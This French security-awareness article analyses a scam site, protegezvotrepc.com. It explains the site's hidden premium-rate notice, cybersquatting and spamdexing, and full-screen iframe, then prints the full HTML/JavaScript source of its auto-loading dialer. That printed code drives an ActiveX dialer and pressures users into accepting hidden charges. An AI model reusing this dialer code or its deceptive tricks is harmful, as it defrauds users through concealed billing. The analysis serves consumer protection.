Analyse d'un site piégé avec un dialer : protegezvotrepc.com

Analyse d'un site piégé avec un dialer : protegezvotrepc.com

   
En savoir plus :  Retourner à la page précédente   Imprimer cette page   

FAQ Microsoft Windows
 
 
Analyse de la page d'accueil du site "Protegezvotrepc.com".


Vous pouvez tomber sur un site à priori intéressant. Regardez bien la page d'accueil de ce site :





Cela à l'air propre. Il y a cette toute petite boite avec un début de texte qui semble simplement donner le nom de la société éditrice de ce site. La boîte de texte est tellement microscopique que l'on ne peut rien lire en tentant de faire défiler le texte. Et il y a ce "Patientez".
  1. Pourquoi ce site me demande de patienter ? Que se passe t'il pendant que je patiente ?
  2. Pourquoi ce site cache quelque chose, tout en faisant semblant de l'afficher, dans cette microscopique boîte ?
Analyse du piège :
  1. Avertissement caché.

    Faire un clic droit dans la boite de texte > Sélectionner tout > clic droit > Copier > Ouvrir son traitement de texte favori (ou Notepad) > coller le tout :
    Voilà ce que l'on peut lire

    Editeur Live Interactive
    Centre technique de paiement : Mediason . Contact : 04 56 58 94 00
    0836012015 1,35 Euro TTC + 0,34 TTC Euro / Min

    Pour accéder à ce service vous déclarez :
    • Avoir l'âge de majorité légale tel que défini dans votre pays.

    • Savoir que le site auquel vous avez accès par l'intermédiaire de ce dialer est un service payant.

    • La loi vous permet de télécharger, partager et utiliser uniquement les fichiers (Musique, Vidéo, Jeux, Logiciels...) dont vous possédez les droits d'utilisation ou diffusion.

    • Ne consulter ce service qu'à titre personnel

    • Vous engager à mettre en oeuvre tous les moyens existants à ce jour pour empêcher un mineur d'utiliser votre ordinateur pour parvenir à ce service

    • Décharger l'éditeur de ce service de toute responsabilité si un mineur venait à accéder à ce site par négligence de votre part de quelque manière que possible.

    Donc :
    • C'est un site payant et nous payons dès que l'on arrive dessus, avant d'avoir eu le temps de comprendre de quoi il retourne car le "Patientez" c'est le chargement automatique du dialer, coupure de la communication Internet et rappel d'un numéro lourdement surtaxé immédiatement.

    • Cet avertissement, bien que caché, est probablement prévu juste pour avoir le mérite d'exister et contrer toute attaqe en justice (encore que toute attaque en justice soit complètement hypothétique puisque l'escroc en question réside à Montévidéo, en Uruguay, comme on peut le voir en faisant un "Whois" sur le nom de domaine protegezvotrepc.com !).

    • Il y a un "interressant" avertissement d'interdiction aux mineurs. Pourquoi diable un site de sécurité informatique serait interdit aux mineurs ? En réalité, ce site appartient à une nébuleuse de sites dont plusieurs sont de type pornographique et le dialer utilisé est le même pour tous les sites de ce gang.
  2. Abonnement (prélèvement automatique sur votre compte !) sans votre accord !
    Sur les sites de cette nébuleuse maffieuse, on trouve, au hasard de la navgation, en petit caractères :
    "Pour votre confort, votre accès sera reconduit à 39.98€ mensuel."

  3. Cyber squatting et spamdexing
    Je suis arrivé sur cette page en faisant une recherche avec Google sur EZ eTrust antivirus et, effectivement, l'url commence bien par etrust-antivirus. Lisons le code source de la page ou nous sommes :
    h..p://etrust-antivirus.antivirus-protegez.com.ar/telechargements-etrust-antivirus/etrust-antivirus.php

    On voit immédiatement la présence d'un accès à un autre site, h..p://www.protegezvotrepc.com, dans un iFrame occupant la totalité de la surface écran, donc on ne se rend pas compte du changement de site :
    <iframe SRC="http://www.protegezvotrepc.com/entrer.php?w=1&c=n&id=frantivirus&m=s" ALLOWTRANSPARENCY="true" width="800" height="1000" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no" target="_blank"></iframe>

    On remarque aussi la présence d'une balise "marquee", un truc non standard, ne fonctionnant que dans Internet Explorer, et permettant de faire défiler du texte. En regardant rapidement le code source, le texte soumis au défilement semble très long mais de bon alois - les liens donnés sont réels et vers des sites solides. Par exemple :

    [PDF] S . G . D . N AVIS DU CERTA Gestion du document 1 Risque 2 ...Format de fichier: PDF/Adobe Acrobat - Version HTML
    ... CERTA Affaire suivie par : CERTA Paris, le 16 février 2004 N o CERTA-2004-AVI-040 AVIS DU CERTA Objet : Vulnérabilité de eTrust Antivirus Les informations ...
    www.certa.ssi.gouv.fr/site/CERTA-2004-AVI-040.pdf
    http://www.certa.ssi.gouv.fr

    Il y a ainsi plus de 200 textes, soit plus de 1000 lignes, provenant d'une capture de recherche "eTrust Antivirus" sur Google. On va donc trouver dans cette page plus de 200 fois le terme "eTrust Antivirus".

    En regardant de plus près, le texte défile en noir sur fond noir (il sera donc invisible) et la balise "marquee" a une largeur de 5 pixels sur une hauteur de 10 pixels (elle est tellement microscopique qu'elle est indétectable). Donc la présence de cette capture n'est pas destinée au visiteur du site.

    En réalité, le nom de l'url qui contient "etrust-antivirus" est du cyber-squatting (une recherche Google permet de trouver qu'ils ont, à la date d'écriture de cette page, plus de 1840 pages avec des URLs ainsi faites) et le contenu de chaque page de ce site contient plus de 200 fois le terme recherché. C'est du "spamdexing" afin de fausser les classements dans les moteurs de recherches. Le "poids" des mots "etrust-antivirus" étant très important dans cette page, elle sera classée dans les premières réponses des moteurs de recherches. Je ne recopie pas le code source de cette page qui fait plus de 1000 lignes de long, certaines lignes étant, en plus, très longues.

    En avril 2006, une nouvelle analyse fera ressortir que ce site pratique ce spamdexing à une échelle de plus en plus vaste et que les mots clés insérés sont aussi ceux des réels sites de sécurité ayant une bonne pupularité. Ainsi, assiste.com fait les frais de cette technique qui vise à détourner le traffic Internet.
  4. Dialer à chargement automatique
    Mais revenons à notre dialer. Lecture du code source de cette page : h..p://www.protegezvotrepc.com

    L'appel au chargement du dialer est immédiat avec incitation à cliquer sur un "Oui" (pour lancer la communication dont vous n'avez pas conscience) qui les "couvre" s'ils vous venait à l'idée de porter plainte après lecture de votre note de téléphone (mais allez porter plainte contre ce maffieux résidant à Montévidéo, en Uruguay !).

    On remarque également la présence d'un lien de lecture des conditions générales sur le site bien connu h...tp://ip.sponsoradulto.com/terms.php dont le nom suffit à comprendre de quoi il retourne. C'est la même maffia du Net qui oeuvre dans le sexe, les faux utilitaires de sécurité, les jeux d'argent et les faux médicaments.

    La manière de nommer les fonctions et les variables utilisées fait penser à une origine espagnole (condiciones, datos, desinstalacion, estadoboton, no_cargar, conectar...). On remarque également que la détection ADSL (qui ne supporte toujours pas les dialers) renvoie vers une autre méthode de consultation payante du site. On remarque encore l'appel à des applets Java externes (fichiers .js).

    L'appel au dialer
    <base href="http://www.protegezvotrepc.com/fr/1/n/">
    <html>
    <head>
    <script language="JavaScript">
    setInterval("window.status='PROTEGEZ VOTRE PC'",5);

    function condiciones(link) {
    window.open('http://ip.sponsoradulto.com/terms.php','_blank','width=372,height=216,scrollbars');
    }

    function datos() {
    window.open('http://www.liveinteractive.net/info/fr/', 'c', 'width=450, height=300, scrollbars=no, resizable=no');
    }

    function desinstalacion(link) {
    window.open(link, 'd', 'width=615, height=420, scrollbars=no, resizable=no');
    }

    var estadoboton = 1;
    var argstr = location.search.substring(1, location.search.length)
    var args = argstr.split('&');
    var estag = false;
    for (var i = 0; i < args.length; i++){
    if(args[i] == "g=si" || args[i] == "g=SI" || args[i] == "g=1")
    estag = true;
    }

    var flag=1;
    function detalle(i) {
    if (document.layers) { // Set visibility for NN and IE
    visible = 'show';
    hidden = 'hide';
    } else if (document.all || document.getElementById) {
    visible = 'visible';
    hidden = 'hidden';
    }
    x = 'Layer'+i;
    if (document.layers) {
    lay2 = document.layers[x];
    } else if (document.all) {
    lay2 = document.all(x).style;
    } else if (document.getElementById) {
    lay2 = document.getElementById(x).style;
    }
    if (flag==0) {
    flag =1;
    lay2.visibility = hidden;
    } else {
    flag =0;
    lay2.visibility = visible;
    }
    }
    </script>
    <script language="JavaScript" for="ObjSysWebTelecom" EVENT="OnErrorConectando()">
    conectando=false;
    conectado=false;
    </script>
    <script language="JavaScript" for="ObjSysWebTelecom" EVENT="OnConectar()">
    conectando=false;
    conectado=true;

    </script>
    <script language="JavaScript" for="ObjSysWebTelecom" EVENT="OnDesconectar()">
    conectado=false;
    </script>
    <script language="JavaScript">
    if (navigator.appVersion.substring(0,1) >= 3) {
    i1=new Image;
    i1.src='conectando.gif';
    i2=new Image;
    i2.src='entrar.gif';
    }

    var timer;
    var ready = false;
    var conectando = false;
    var conectado = false;
    var no_cargar = false;
    var no_recargar = false;

    function conectar() {

    if (no_cargar) {
    var urlactual = new String(self.location);
    if (urlactual.indexOf('?') == -1) {
    window.location = urlactual + '?v=1';
    } else {
    window.location = urlactual + '&v=1';
    }
    } else {
    clickentrar();
    detalle(0);
    if ((!conectando) && (!conectado) && (ready)) {
    if (ObjSysWebTelecom.isAdsl==true){
    document.URL = "http://adsl.protegezvotrepc.com/?capa=1281n&usuario=frantivirus";
    }else{
    ObjSysWebTelecom.Conectar();
    conectando=true;
    }
    }
    else {
    if ((conectado) && (ready))
    ObjSysWebTelecom.Desconectar();
    }
    }
    }

    function arrancar() {
    if (ready && !no_cargar) {
    ObjSysWebTelecom.Categoria="n1&wd=162&c=128&login=frantivirus&pais=fr";
    ObjSysWebTelecom.inicio('frantivirus','4','http://dialers.syswebtelecom.com/2/fr/');
    }
    }

    function setready (state) {
    ready = state;
    if (!ready && !conectando) {
    if (estag) {
    document.URL = history.back();
    } else {
    if (window.navigator.userAgent.indexOf("SV1") != -1) {
    no_cargar = true;
    return false;
    }
    var urlactual = new String(self.location);
    if (urlactual.indexOf('?v=1') > 0 || urlactual.indexOf('&v=1') > 0) {
    window.location = 'http://www.logicielsatelecharger.com/?id=frantivirus';
    return false;
    } else {
    alert('Pour accéder à notre contenu vous devez cliquer sur \'Oui\' dans la prochaine fenêtre');
    }
    if (no_recargar) {
    no_cargar = true;
    } else {
    var urlactual = new String(self.location);
    if (urlactual.indexOf('?') == -1) {
    window.location = urlactual + '?v=1';
    } else {
    window.location = urlactual + '&v=1';
    }
    }
    }
    } else {
    timer = setTimeout("arrancar()",1000);
    }
    }

    function clickentrar(){
    if (estadoboton == 1) {
    if(document.entrada) {
    document.entrada.src = 'entrar.gif';
    } else {
    document.getElementById('entrada').value = "ENTRER >>";
    }
    estadoboton = 2;
    } else {
    if(document.entrada) {
    document.entrada.src = 'conectando.gif';
    } else {
    document.getElementById('entrada').value = "CHARGEMENT";
    }
    }
    }
    </script>
    <script type="text/javascript" language="javascript" src="/funciones.js"></script>
    <script>
    function showContract() {
    var textAreas = document.body.getElementsByTagName("textarea");
    textAreas[0].style.visibility = "visible";
    }
    </script>
    <style type="text/css">
    .lay1 {
    position: absolute;
    width: 346px;
    height: 64px;
    left: 50%;
    top: 50%;
    z-index: 2;
    margin-left: -173px;
    margin-top: -32px;
    border: 1px solid black;
    font-family: Arial, Helvetica, Sans-serif;
    font-size: 14px;
    background-color: #FFFFFF;
    layer-background-color: #CCCC99;
    color: #000000;
    visibility: hidden;
    }
    </style>
    <style type="text/css">
    .idioma {
    color: #ffffff;

    font-family: Tahoma, Verdana, Arial;
    font-size: 11px;
    font-style: normal;
    font-weight: bold;
    text-decoration: none;
    }
    <!--
    .t11px {
    font-family: Tahoma;
    font-size: 11px;
    font-weight: normal;
    }
    a:hover {text-decoration: underline; color: #003366; }
    a:link {text-decoration: none;}
    a:visited {text-decoration: none;}
    .v11px {
    font-family: Verdana;
    font-size: 13px;
    font-weight: bold;
    }
    .a11px {
    font-family: Tahoma;
    font-size: 11px;
    font-weight: bold;
    }
    .a11px:hover {text-decoration: none;
    color: #000000;
    font-family: Tahoma;
    font-size: 11px;
    font-weight: bold;
    }
    .buscador {
    font-size: 11px;
    font-weight: normal;
    font-family: Verdana;
    color: #0066CC;
    background-color: #000033;
    border-color: #0066CC #0066CC #0066CC #0066CC;
    border-style: solid;
    border-top-width: 1px;
    border-right-width: 1px;
    border-bottom-width: 1px;
    border-left-width: 1px;
    -->
    }
    <!-- Blanco o Negro, que contraste con el fondo -->
    .entrando {
    color: #ffffff;

    font-family: Verdana, Arial, Helvetica;
    font-size: 10px;
    font-style: normal;
    font-weight: normal;
    text-decoration: none;
    }
    a.linkpie:link {
    color: #ffffff;

    font-family: Tahoma, Verdana, Arial;
    font-size: 11px;
    font-style: normal;
    font-weight: bold;
    text-decoration: none;
    }
    a.linkpie:active {
    color: #ffffff;

    font-family: Tahoma, Verdana, Arial;
    font-size: 11px;
    font-style: normal;
    font-weight: bold;
    text-decoration: none;
    }
    a.linkpie:visited {
    color: #ffffff;

    font-family: Tahoma, Verdana, Arial;
    font-size: 11px;
    font-style: normal;
    font-weight: bold;
    text-decoration: none;
    }
    a.desinstalacion:link {
    color: #ffffff;

    font-family: Tahoma, Verdana, Arial;
    font-size: 11px;
    font-style: normal;
    font-weight: normal;
    text-decoration: none;
    }
    a.desinstalacion:active {
    color: #ffffff;

    font-family: Tahoma, Verdana, Arial;
    font-size: 11px;
    font-style: normal;
    font-weight: normal;
    text-decoration: none;
    }
    a.desinstalacion:visited {
    color: #ffffff;

    font-family: Tahoma, Verdana, Arial;
    font-size: 11px;
    font-style: normal;
    font-weight: normal;
    text-decoration: none;
    }
    a.desinstalacion:hover {
    color: #ffffff;

    font-family: Tahoma, Verdana, Arial;
    font-size: 11px;
    font-style: normal;
    font-weight: normal;
    text-decoration: underline;
    }
    .copyright {
    color: #ffffff;

    font-family: Tahoma, Verdana, Arial;
    font-size: 11px;
    font-style: normal;
    font-weight: normal;
    text-decoration: none;
    }


    <!-- Un color de la Promo -->
    a.linkpie:hover {
    color: #333366;

    font-family: Tahoma, Verdana, Arial;
    font-size: 11px;
    font-style: normal;
    font-weight: bold;
    text-decoration: underline;
    }
    .certifico {
    color: #333366;

    font-family: Verdana, Arial, Helvetica;
    font-size: 10px;
    font-style: normal;
    font-weight: bold;
    text-decoration: none;
    }


    <!-- Otro color de la Promo -->
    .linea {
    color: #333366;

    font-family: Tahoma, Verdana, Arial;
    font-size: 11px;
    font-style: normal;
    font-weight: bold;
    text-decoration: none;
    }


    <!-- Según diseño -->
    .contrato {
    visibility: hidden;
    color: #666666;
    background-color: #000000; border: 0px;
    width: 382px;
    height: 84px;

    font-family: Arial, Verdana, Helvetica;
    font-size: 10px;
    font-style: normal;
    font-weight: normal;
    text-decoration: none;
    }
    .ve11px {
    font-family: Tahoma;
    font-size: 11px;
    line-height: 13px;
    font-weight: normal;
    text-decoration: none;
    }
    </style>
    <title>PROTEGEZ VOTRE PC</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    </head>

    <body onload="clickentrar(); showContract();" bgcolor="#000000" text="#FFFFFF" link="#FFFFFF" vlink="#FFFFFF" alink="#FFFFFF" leftmargin="0" marginheight="0" marginwidth="0" topmargin="0">
    <div id="Layer0" class="lay1" style="top: 200px" align="center">
    <table width="100%" border="0" cellspacing="5" cellpadding="0">
    <tr>
    <td>
    <div align="center">
    <b><font color="#000000">CHARGEMENT</font></b></div>
    </td>
    </tr>
    <tr>
    <td>
    <div align="center">
    <img src="barra_once.gif"></div>
    </td>
    </tr>
    </table>
    </div>
    <div align="center">
    <table width="100%" border="0" cellspacing="0" cellpadding="0" height="100%">
    <tr>
    <td align="center" valign="middle">
    <table width="516" border="0" cellspacing="0" cellpadding="0" align="center" height="296">
    <tr>
    <td align="center" valign="bottom" width="516" height="296" background="logo.gif">
    <table width="214" border="0" cellspacing="0" cellpadding="0" height="98">
    <tr>
    <td align="center" valign="middle"><input style="font-family: Tahoma; font-size: 22px; font-weight: bold; border-top-width: 2px; border-right-width: 2px; border-bottom-width: 2px; border-left-width: 2px; cursor: hand" onclick="javascript:conectar();" type="button" name="entrada" value="PATIENTEZ"></td>
    </tr>
    </table>
    </td>
    </tr>
    </table>
    <p align="center"></p>
    <p align="center"><textarea class="contrato" name="textarea">Editeur Live Interactive
    Centre technique de paiement : Mediason . Contact : 04 56 58 94 00
    0836012015 1,35 Euro TTC + 0,34 TTC Euro / Min

    Pour acc&eacute;der &agrave; ce service vous d&eacute;clarez :

    * Avoir l'&acirc;ge de majorit&eacute; l&eacute;gale tel que d&eacute;fini dans votre pays.

    * Savoir que le site auquel vous avez acc&egrave;s par l&#146;interm&eacute;diaire de ce dialer est un service payant.

    * La loi vous permet de t&eacute;l&eacute;charger, partager et utiliser uniquement les fichiers (Musique, Vid&eacute;o, Jeux, Logiciels...) dont vous poss&eacute;dez les droits d'utilisation ou diffusion.

    * Ne consulter ce service qu'&agrave; titre personnel

    * Vous engager &agrave; mettre en oeuvre tous les moyens existants &agrave; ce jour pour emp&ecirc;cher un mineur d'utiliser votre ordinateur pour parvenir &agrave; ce service

    * D&eacute;charger l'&eacute;diteur de ce service de toute responsabilit&eacute; si un mineur venait &agrave; acc&eacute;der &agrave; ce site par n&eacute;gligence de votre part de quelque mani&egrave;re que possible.

    </textarea></p>
    <p align="center"></p>
    <p>&nbsp;</p>
    </td>
    </tr>
    </table>
    </div>
    </body>

    </html>

  5. Que devient ce site en Juin 2006 ?



    Le coup du dialer est reconduit (ici il se casse la figure puisque un iFrame avec Firefox, ça ne marche pas mais 90% des internautes sont équipés IE !
    Et un abonnement à près de 40€ par mois est sous-entendu )!

    Le coup des logiciels avec pignon sur rue pour appâter le gogo et se donner une apparence de virginité est reconduit (Norton, ZoneAlarm etc. ...)

    Le téléchargement des logiciels gratuits et des versions de démonstration, officiellement toujours gratuites, est payant sur ce site attrape couillons !

    Dommage ! Il n'y a pas d'extraterritorialité de la justice, en France, pour poursuivre cette bande en Uruguay !





Historique des révisions de ce document :

Historique
 
   
Rédigé en écoutant :
Santana - Greatest hits (black magic women, oye como va etc. ...)